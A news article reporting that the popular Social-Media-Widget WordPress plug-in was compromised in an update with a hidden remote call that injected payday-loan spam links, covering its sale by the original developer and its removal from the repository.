A popular plug-in for sharing blog content on social networks was discovered to have hidden code that was injecting WordPress blogs with links to phony Pay Day Loan offers and other spam, according to the firm Sucuri.
The plug-in, named Social-Media-Widget (SMW) was compromised with malicious code 12 days ago, in concert with an update of the widget. The new version of the plug-in contained a hidden call to a remote PHP script that inserted “Pay Day Loan” spam text and links into WordPress web sites running the plugin. The goal was to infect as many web sites as possible with text that would increase the web reputation and visibility of a web site run by the spammers, according to the post on Tuesday, by Daniel Cid, Sucuri’s CTO.
SMW is among the most popular add-ons for Wordpess sites. It allows bloggers who use WordPress to configure sharing buttons that will appear on their blog and accompany each blog post, allowing readers to circulate the blog content out to social media websites or other blogs.
WordPress statistics show that it had been downloaded around 935,000 times through the end of March. The plug-in was the creation of Brian Freytag, a Michigan based developer. In a post from Freytag’s personal blog dated January 15, however, he claims to have sold the widget to an “unnamed company for an unnamed sum,” saying he was unable to continue developing the free utility.
On Tuesday, someone using Freytag’s name left comments in a support forum for SMW that said he no longer has any involvement with the plug-in and expressed dismay at its use as a spamming tool.
“I just want to make it clear that I have not been the maintainer of Social Media Widget since January of 2013 (version 2.9.5),” the user claiming to be Freytag said. “I want the record to reflect that this issue arose months after I passed off the widget and have not had…access since signing over the widget in January.”
Freytag claims to have had a “discussion” with the party he sold the widget to, and that he claims that a freelance developer working on the plug-in “decided to go rogue or his password was cracked.” He did not immediately respond to a request for comment from The Security Ledger.
WordPress has since acted quickly to remove the plugin from its official WordPress Plugin Repository. Sucuri recommends that WordPress sites using the plug-in remove it immediately.
Social sharing plug-ins like Social Media Widget are enormously popular in online publishing. However, they also easy targets for scammers and can expose users to infection or unwanted tracking. “Many sharing tools track users and gain access to valuable information, which is stored in user profile databases that can be breached,” Veracode said. The security firm Veracode in February warned about the security dangers of sharing plug-ins and released SmartShare, an internally developed and secure sharing utility.